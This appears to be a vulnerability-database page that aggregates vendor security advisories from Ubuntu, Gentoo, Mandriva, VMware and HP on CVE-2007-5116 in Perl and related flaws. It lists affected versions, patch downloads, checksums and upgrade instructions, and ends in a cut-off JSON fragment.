    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:    31910 f109f1280eb2d49cd1c1ce6a0ca1f0be
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_i386.deb
      Size/MD5:  3386812 7d0627fd447f7304f09cf1f97fd9a60d
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:   655908 8938912ff5b287ecf0cc03346c34bbb1
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:     1064 798ce70342c8d3604f23f5752866ea81
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:   854220 c486169333316db7439e1095b1cce637
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:  2724854 bdcd88d30efe2b485b35250c5c3ee797
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:    37026 a83324fe5b2179fd06f06bd68d349f25
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_powerpc.deb
      Size/MD5:  3768652 1a31197fa79647a63ea3ae553353a857
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:   596948 2d898e93ec93bec4f77d7d88601fab96
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:     1060 3d3ecf3c4b079230a7232667d86df061
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:   799330 db0cf8569787563788f4b4299f3a24c3
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:  2594250 4d26ef4c14fa16e0cd5b94a75596590d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:    33122 264999f3199971dc1cf0aca911c3b1ea
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1_sparc.deb
      Size/MD5:  3684732 497152ef28c663d150b4d1d564a1b068
    

    . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-11


                                            http://security.gentoo.org/
    

    Severity: Normal Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities Date: December 12, 2014 Bugs: #196865, #335508, #483632, #508322 ID: 201412-11


    Synopsis

    Multiple vulnerabilities have been found in AMD64 x86 emulation base libraries, the worst of which may allow remote execution of arbitrary code.

    Background

    AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries.

    Affected packages

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
    

    1 app-emulation/emul-linux-x86-baselibs < 20140406-r1 >= 20140406-r1

    Description

    Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details.

    Impact

    A context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information.

    Workaround

    There is no known workaround at this time.

    Resolution

    All users of the AMD64 x86 emulation base libraries should upgrade to the latest version:

    # emerge --sync # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1"

    NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.

    References

    [ 1 ] CVE-2007-0720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720 [ 2 ] CVE-2007-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536 [ 3 ] CVE-2007-2026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026 [ 4 ] CVE-2007-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445 [ 5 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 6 ] CVE-2007-3108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108 [ 7 ] CVE-2007-4995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995 [ 8 ] CVE-2007-5116 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116 [ 9 ] CVE-2007-5135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135 [ 10 ] CVE-2007-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266 [ 11 ] CVE-2007-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268 [ 12 ] CVE-2007-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269 [ 13 ] CVE-2007-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849 [ 14 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 15 ] CVE-2013-0338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338 [ 16 ] CVE-2013-0339 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339 [ 17 ] CVE-2013-1664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664 [ 18 ] CVE-2013-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969 [ 19 ] CVE-2013-2877 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877 [ 20 ] CVE-2014-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-201412-11.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

    License

    Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 .

    Updated packages have been patched to prevent these issues.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116


    Updated Packages:

    Mandriva Linux 2007.0: 7dee97092269465ccb5de0f35321ab13 2007.0/i586/perl-5.8.8-7.1mdv2007.0.i586.rpm efd626e1f1efd248e6c6570e88a599c3 2007.0/i586/perl-base-5.8.8-7.1mdv2007.0.i586.rpm 62b10d28a5abc05d3b8cd35c7f68e8aa 2007.0/i586/perl-devel-5.8.8-7.1mdv2007.0.i586.rpm 3a9dc19143ab6a27713fdeb6665d8d76 2007.0/i586/perl-doc-5.8.8-7.1mdv2007.0.i586.rpm 60b511580ae4f514434dd111efa42872 2007.0/i586/perl-suid-5.8.8-7.1mdv2007.0.i586.rpm 08e44392992b4ab983bf85debb8be462 2007.0/SRPMS/perl-5.8.8-7.1mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: be33f079454aec3b88f21716dfacf8d6 2007.0/x86_64/perl-5.8.8-7.1mdv2007.0.x86_64.rpm 5a82850218434119c3f55047b3068213 2007.0/x86_64/perl-base-5.8.8-7.1mdv2007.0.x86_64.rpm 4f995ed4fa46f2bf79a427d9341e895b 2007.0/x86_64/perl-devel-5.8.8-7.1mdv2007.0.x86_64.rpm e949a7e20661c6c5f4c4511f25196ff6 2007.0/x86_64/perl-doc-5.8.8-7.1mdv2007.0.x86_64.rpm a3df44cc0b957b02bfcab3eed98542dd 2007.0/x86_64/perl-suid-5.8.8-7.1mdv2007.0.x86_64.rpm 08e44392992b4ab983bf85debb8be462 2007.0/SRPMS/perl-5.8.8-7.1mdv2007.0.src.rpm

    Mandriva Linux 2007.1: efb800025ab3001b90af0e16e5a49886 2007.1/i586/perl-5.8.8-10.1mdv2007.1.i586.rpm 515beec177dd5a0418090016ae357274 2007.1/i586/perl-base-5.8.8-10.1mdv2007.1.i586.rpm ae79195a6f27e44fd4ff7899497cf948 2007.1/i586/perl-devel-5.8.8-10.1mdv2007.1.i586.rpm f721306e820d4c66db3466917cde67f9 2007.1/i586/perl-doc-5.8.8-10.1mdv2007.1.i586.rpm 85a219e5b2c3788841024be8d81b2cac 2007.1/i586/perl-suid-5.8.8-10.1mdv2007.1.i586.rpm 9b22a92ec4a3dc898a12bbb80ada4de2 2007.1/SRPMS/perl-5.8.8-10.1mdv2007.1.src.rpm

    Mandriva Linux 2007.1/X86_64: 1a17302f843293a5dc0063fe3e4549c0 2007.1/x86_64/perl-5.8.8-10.1mdv2007.1.x86_64.rpm c85ba481d517ec81c54eea5bc7064405 2007.1/x86_64/perl-base-5.8.8-10.1mdv2007.1.x86_64.rpm 5d3b84a1444339a83058bc3493506d22 2007.1/x86_64/perl-devel-5.8.8-10.1mdv2007.1.x86_64.rpm 005d395a8717bd5af248820eb01cc1d8 2007.1/x86_64/perl-doc-5.8.8-10.1mdv2007.1.x86_64.rpm f6c966ea032f921f033934d1f894b96b 2007.1/x86_64/perl-suid-5.8.8-10.1mdv2007.1.x86_64.rpm 9b22a92ec4a3dc898a12bbb80ada4de2 2007.1/SRPMS/perl-5.8.8-10.1mdv2007.1.src.rpm

    Mandriva Linux 2008.0: 6e84010549818c839e91034391b79f4f 2008.0/i586/perl-5.8.8-12.1mdv2008.0.i586.rpm f09541f2caf348aee64161cecdf7276e 2008.0/i586/perl-base-5.8.8-12.1mdv2008.0.i586.rpm dce7ae7aba1d356fd366075b67478493 2008.0/i586/perl-devel-5.8.8-12.1mdv2008.0.i586.rpm b3169afea74fd707021d03410172b6c0 2008.0/i586/perl-doc-5.8.8-12.1mdv2008.0.i586.rpm 78585fde0ad5b02f3e7c0f01d31a1ccf 2008.0/i586/perl-suid-5.8.8-12.1mdv2008.0.i586.rpm 584ad050342c7136e161fc48d29398bf 2008.0/SRPMS/perl-5.8.8-12.1mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 6ee9071cb1b0a6f38e731b1cd9a421e7 2008.0/x86_64/perl-5.8.8-12.1mdv2008.0.x86_64.rpm d7bd85fb101d94bf1dc84bcf817533d7 2008.0/x86_64/perl-base-5.8.8-12.1mdv2008.0.x86_64.rpm 031487e27d7f2a12003efe8ab714a096 2008.0/x86_64/perl-devel-5.8.8-12.1mdv2008.0.x86_64.rpm 3c1846b134cbd1461ffd291a95f6e2d2 2008.0/x86_64/perl-doc-5.8.8-12.1mdv2008.0.x86_64.rpm 99f545fefe35f45b5d90d2f98fe14da5 2008.0/x86_64/perl-suid-5.8.8-12.1mdv2008.0.x86_64.rpm 584ad050342c7136e161fc48d29398bf 2008.0/SRPMS/perl-5.8.8-12.1mdv2008.0.src.rpm

    Corporate 3.0: 9388a0766403e1accc6afc3d963960ba corporate/3.0/i586/perl-5.8.3-5.6.C30mdk.i586.rpm a67623fb7d2e4e18ca8976c64e43a4ca corporate/3.0/i586/perl-base-5.8.3-5.6.C30mdk.i586.rpm 9068ad50c3e10c29940bb071651a8d4d corporate/3.0/i586/perl-devel-5.8.3-5.6.C30mdk.i586.rpm a8a2e1b1963c212e4644c320f27c71d3 corporate/3.0/i586/perl-doc-5.8.3-5.6.C30mdk.i586.rpm 15b73b73ea6dd0de1100e1445690c034 corporate/3.0/SRPMS/perl-5.8.3-5.6.C30mdk.src.rpm

    Corporate 3.0/X86_64: f2f7445b49d5d7afa7b3766d71bdf65f corporate/3.0/x86_64/perl-5.8.3-5.6.C30mdk.x86_64.rpm ef5dabb99fdbe28068089eba1fd8bcc4 corporate/3.0/x86_64/perl-base-5.8.3-5.6.C30mdk.x86_64.rpm 4a5a04a330db20f460229aa69ded5e95 corporate/3.0/x86_64/perl-devel-5.8.3-5.6.C30mdk.x86_64.rpm 2bc06d931706f57fa946822f9396ffd6 corporate/3.0/x86_64/perl-doc-5.8.3-5.6.C30mdk.x86_64.rpm 15b73b73ea6dd0de1100e1445690c034 corporate/3.0/SRPMS/perl-5.8.3-5.6.C30mdk.src.rpm

    Corporate 4.0: e158109794ad5e71bc02f41adec150e1 corporate/4.0/i586/perl-5.8.7-3.3.20060mlcs4.i586.rpm 03c680726cf01c3d8f25cb7d61d7bb10 corporate/4.0/i586/perl-base-5.8.7-3.3.20060mlcs4.i586.rpm 51f55a3998dbcf2e9abcf821ffb3026f corporate/4.0/i586/perl-devel-5.8.7-3.3.20060mlcs4.i586.rpm f936e8720be0d37223b8a97dc2ed2704 corporate/4.0/i586/perl-doc-5.8.7-3.3.20060mlcs4.i586.rpm b4068ddb2d92f4845c29a6b3ca8feef5 corporate/4.0/i586/perl-suid-5.8.7-3.3.20060mlcs4.i586.rpm 3b23f4612d0a011d50c5eb6960ffa5c4 corporate/4.0/SRPMS/perl-5.8.7-3.3.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: c42250a8c42a0e349102ff977c6659cc corporate/4.0/x86_64/perl-5.8.7-3.3.20060mlcs4.x86_64.rpm 82d2bcbda0229415464c10471f881517 corporate/4.0/x86_64/perl-base-5.8.7-3.3.20060mlcs4.x86_64.rpm 7f07eddd92d4c49b3ee5c32c69d52996 corporate/4.0/x86_64/perl-devel-5.8.7-3.3.20060mlcs4.x86_64.rpm 140b57c79fc305a52e13ce5550e7d05c corporate/4.0/x86_64/perl-doc-5.8.7-3.3.20060mlcs4.x86_64.rpm ec3007ca202716e0c3872c37141fc2cc corporate/4.0/x86_64/perl-suid-5.8.7-3.3.20060mlcs4.x86_64.rpm 3b23f4612d0a011d50c5eb6960ffa5c4 corporate/4.0/SRPMS/perl-5.8.7-3.3.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: 8ea5d389e9ddd9ca2e1b78869ad14ca7 mnf/2.0/i586/perl-5.8.3-5.6.M20mdk.i586.rpm f53bd974980010568e5153578d628323 mnf/2.0/i586/perl-base-5.8.3-5.6.M20mdk.i586.rpm 1335c295512b38ea524e201c66551132 mnf/2.0/i586/perl-devel-5.8.3-5.6.M20mdk.i586.rpm 8e306b59ecbb8583d5c1e4e74ef62e34 mnf/2.0/i586/perl-doc-5.8.3-5.6.M20mdk.i586.rpm 7576ea8ec817978b4602f5bf4c3436c5 mnf/2.0/SRPMS/perl-5.8.3-5.6.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)

    iD8DBQFHL9FBmqjQ0CJFipgRAhxaAJ44oWRrf/Q1Zj9q+HP4Y3pj9Y8XugCg398H Rl9c0TwvCe/HjAyI42+NhlU= =o1R+ -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256


                   VMware Security Advisory
    

    Advisory ID: VMSA-2008-0001.1 Synopsis: Moderate OpenPegasus PAM Authentication Buffer Overflow and updated service console packages Issue date: 2008-01-07 Updated on: 2008-01-22 CVE numbers: CVE-2007-5360 CVE-2007-5398 CVE-2007-4572 CVE-2007-5191 CVE-2007-5116 CVE-2007-3108 CVE-2007-5135


    1. Summary:

    Updated service console patches

    1. Relevant releases:

    ESX Server 3.5 without patches ESX350-200712402-SG, ESX350-200712403-SG, ESX350-200712404-SG

    ESX Server 3.0.2 without patches ESX-1002969, ESX-1002970, ESX-1002971, ESX-1002975, ESX-1002976

    ESX Server 3.0.1 without patches ESX-1002962, ESX-1002963, ESX-1002964, ESX-1002968, ESX-1002972, ESX-1003176

    ESX Server 2.5.5 before Upgrade Patch 3 ESX Server 2.5.5 before Upgrade Patch 14

    1. Problem description:

    I Service Console package security updates

    a. OpenPegasus PAM Authentication Buffer Overflow

    Alexander Sotirov from VMware Security Research discovered a buffer overflow vulnerability in the OpenPegasus Management server. This flaw could be exploited by a malicious remote user on the service console network to gain root access to the service console.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5360 to this issue.

    RPM Updated: pegasus-2.5-552927 VM Shutdown: No Host Reboot: No

    Note: ESX Server 3.5 and ESX Server 3i are not affected by this issue.

    ESX Server 3.0.2 http://download3.vmware.com/software/vi/ESX-1002970.tgz md5sum: d19115e965d486e72100ce489efea707 http://kb.vmware.com/kb/1002970

    ESX Server 3.0.1 http://download3.vmware.com/software/vi/ESX-1003176.tgz md5sum: 5674ca0dcfac90726014cc316444996e http://kb.vmware.com/kb/1003176

    ESX Server 2.5.x

    Users should remove the OpenPegasus CIM Management rpm. This component is disabled by default, and VMware recommends that you do not use this component of ESX Server 2.x. If you want to use the CIM functionality, upgrade to ESX Server 3.0.1 or a later release.

    Note: This vulnerability can be exploited remotely only if the attacker has access to the service console network.

         Security best practices provided by VMware recommend that the
         service console be isolated from the VM network. Please see
         http://www.vmware.com/resources/techresources/726 for more
         information on VMware security best practices.
    

    b. Updated Samba package

        An issue where attackers on the service console management
        network can cause a stack-based buffer overflow in the
        reply_netbios_packet function of nmbd in Samba. On systems
        where Samba is being used as a WINS server, exploiting this
        vulnerability can allow remote attackers to execute arbitrary
        code via crafted WINS Name Registration requests followed by a
        WINS Name Query request.
    
        An issue where attackers on the service console management
        network can exploit a vulnerability that occurs when Samba is
        configured as a Primary or Backup Domain controller. The
        vulnerability allows remote attackers to have an unknown impact
        via crafted GETDC mailslot requests, related to handling of
        GETDC logon server requests.
    
        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the names CVE-2007-5398 and CVE-2007-4572 to these
        issues.
    

    Note: By default Samba is not configured as a WINS server or a domain controller and ESX is not vulnerable unless the administrator has changed the default configuration.

        This vulnerability can be exploited remotely only if the
        attacker has access to the service console network.
    
        Security best practices provided by VMware recommend that the
        service console be isolated from the VM network. Please see
        http://www.vmware.com/resources/techresources/726 for more
        information on VMware security best practices.
    
        RPM Updated:
        samba-3.0.9-1.3E.14.1vmw
        samba-client-3.0.9-1.3E.14.1vmw
        samba-common-3.0.9-1.3E.14.1vmw
    
        VM Shutdown: Yes
        Host Reboot: Yes
    
        ESX Server 3.5.0
        http://download3.vmware.com/software/vi/ESX350-200712402-SG
        md5sum: d83eeef80e27b739546915bc17390ac0
        http://kb.vmware.com/kb/1003204
    
        ESX Server 3.0.2
        http://download3.vmware.com/software/vi/ESX-1002975.tgz
        md5sum: 797a7494c2c4eb49629d3f94818df5dd
        http://kb.vmware.com/kb/1002975
    
        ESX Server 3.0.1
        http://download3.vmware.com/software/vi/ESX-1002968.tgz
        md5sum: 5106d90afaf77c3a0d8433487f937d06
        http://kb.vmware.com/kb/1002968
    
        ESX Server 2.5.5 download Upgrade Patch 3
        ESX Server 2.5.4 download Upgrade Patch 14
    

    c. Updated util-linux package

        The patch addresses an issue where the mount and umount
        utilities in util-linux call the setuid and setgid functions in
        the wrong order and do not check the return values, which could
        allow attackers to gain elevated privileges via helper
        application such as mount.nfs.
    
        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CVE-2007-5191 to this issue.
    
        RPM Updated:
        util-linux-2.11y-31.24vmw
        losetup-2.11y-31.24vmw
        mount -2.11y-31.24vmw
    
        VM Shutdown: Yes
        Host Reboot: Yes
    
        ESX Server 3.5
        http://download3.vmware.com/software/vi/ESX350-200712403-SG.zip
        md5sum: 0656cc3da5a92b22a337ad27ae6f8a6b
        http://kb.vmware.com/kb/1003205
    
        ESX Server 3.0.2
        http://download3.vmware.com/software/vi/ESX-1002976.tgz
        md5sum: 0fe833c50c0ecb0ff9340d6674be2e43
        http://kb.vmware.com/kb/1002976
    
        ESX Server 3.0.1
        http://download3.vmware.com/software/vi/ESX-1002972.tgz
        md5sum: 59ca4a43f330c5f0b7a55693aa952cdc
        http://kb.vmware.com/kb/1002972
    

    d.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CVE-2007-5116 to this issue.
    
        RPM Updated:
        perl-5.8.0-97.EL3
    
        VM Shutdown: Yes
        Host Reboot: Yes
    
        ESX Server 3.5
        http://download3.vmware.com/software/vi/ESX350-200712404-SG.zip
        md5sum: 8f75050d73289cdf74563fa7e494d935
        http://kb.vmware.com/kb/1003206
    
        ESX Server 3.0.2
        http://download3.vmware.com/software/vi/ESX-1002971.tgz
        md5sum: 337b09d9ae4b1694a045e216b69765e1
        http://kb.vmware.com/kb/1002971
    
        ESX Server 3.0.1
        http://download3.vmware.com/software/vi/ESX-1002964.tgz
        md5sum: d47e26104bfd5e4018ae645638c94487
        http://kb.vmware.com/kb/1002964
    

    e. Updated OpenSSL package

        A flaw in the SSL_get_shared_ciphers() function could allow an
        attacker to cause a buffer overflow problem by sending ciphers
        to applications that use the function.
    
        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the names CVE-2007-3108, and CVE-2007-5135 to these
        issues.
    
        RPM Updated:
        openssl-0.9.7a-33.24
    
        VM Shutdown: Yes
        Host Reboot: Yes
    
        ESX Server 3.5
        http://download3.vmware.com/software/vi/ESX350-200712405-SG.zip
        md5sum: 3d0fbea4320e8e424388d4bdc54e40c3
        http://kb.vmware.com/kb/1003208
    
        ESX Server 3.0.2
        http://download3.vmware.com/software/vi/ESX-1002969.tgz
        md5sum: 72fd28a9f9380158db149259fbdcaa3b
        http://kb.vmware.com/kb/1002969
    
        ESX Server 3.0.1
        http://download3.vmware.com/software/vi/ESX-1002962.tgz
        md5sum: a0727bdc2e1a6f00d5fe77430a6ee9d6
        http://kb.vmware.com/kb/1002962
    
        ESX Server 2.5.5 download Upgrade Patch 3
        ESX Server 2.5.4 download Upgrade Patch 14
    
    1. Solution:

    Please review the Patch notes for your product and version and verify the md5sum of your downloaded file.

    ESX Server 3.5 Patches: http://www.vmware.com/download/vi/vi3_patches_35.html

    ESX Server 3.0.x Patches: http://www.vmware.com/download/vi/vi3_patches.html

    ESX Server 2.x Patches: http://www.vmware.com/download/esx/esx2_patches.html

    ESX Server 2.5.5 Upgrade Patch 3 http://download3.vmware.com/software/esx/esx-2.5.5-65742-upgrade.tar.gz md5sum: 9068250fdd604e8787ef40995a4638f9 http://www.vmware.com/support/esx25/doc/esx-255-200712-patch.html

    ESX Server 2.5.4 Upgrade Patch 14 http://download3.vmware.com/software/esx/esx-2.5.4-65752-upgrade.tar.gz md5sum: 24990b9207f882ccc91545b6fc90273d http://www.vmware.com/support/esx25/doc/esx-254-200712-patch.html

    1. References:

    CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5360 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135


    1. Contact:

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    • security-announce@lists.vmware.com
    • bugtraq@securityfocus.com
    • full-disclosure@lists.grok.org.uk

    E-mail: security@vmware.com

    Security web site http://www.vmware.com/security

    VMware security response policy http://www.vmware.com/support/policies/security_response.html

    General support life cycle policy http://www.vmware.com/support/policies/eos.html

    VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

    Copyright 2008 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)

    iD8DBQFHlpPmS2KysvBH1xkRCKt4AJ98f+Dok7eN7gYOvbk/mGCNAbFJTACfVpzi 9QQld6Krd0JgyS2wHGHVF6E= =0DZG -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c01362465 Version: 1

    HPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2008-02-19 Last Updated: 2008-02-19

    Potential Security Impact: Execution of Arbitrary Code

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified in Perl 5.8.7 and earlier running on HP Tru64 UNIX.

    References: CVE-2007-5116

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

    HP Tru64 UNIX v 5.1B-4 HP Tru64 UNIX v 5.1B-3 Internet Express (IX) for HP Tru64 UNIX v 6.7

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2007-5116 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0

    Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

    RESOLUTION HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer until updates are available in mainstream release patch kits.

    The resolutions contained in the ERP kits are targeted for availability in the following mainstream kits:

    The Associated Products CD (APCD) associated with HP Tru64 UNIX v 5.1B-5 Internet Express (IX) for HP Tru64 UNIX v 6.8

    The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the installation of the ERPs is blocked by any of your installed CSPs.

    The ERP kits distribute the following items:

    Patched version of Perl v 5.8.8 including source code

    HP Tru64 UNIX Version v5.1B-4 PREREQUISITE: HP Tru64 UNIX v5.1B-4 PK6 (BL27) Name: perl_V51BB27-ES-20080207 Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=perl_V51BB27-ES-20080207

    HP Tru64 UNIX Version v5.1B-3 PREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) Name: perl_V51BB26-ES-20080204 Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001399-V51BB26-ES-20071207

    Internet Express (IX) for HP Tru64 UNIX v 6.7 PREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) or HP Tru64 UNIX v5.1B-3 PK5 (BL26) NOTE: Use the Perl patch kit appropriate to the operating system version

    MD5 checksums are available from the ITRC patch database main page. From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links.

    PRODUCT SPECIFIC INFORMATION

    HISTORY Version:1 (rev.1) - 19 February 2008 Initial release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2008 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 1.1,
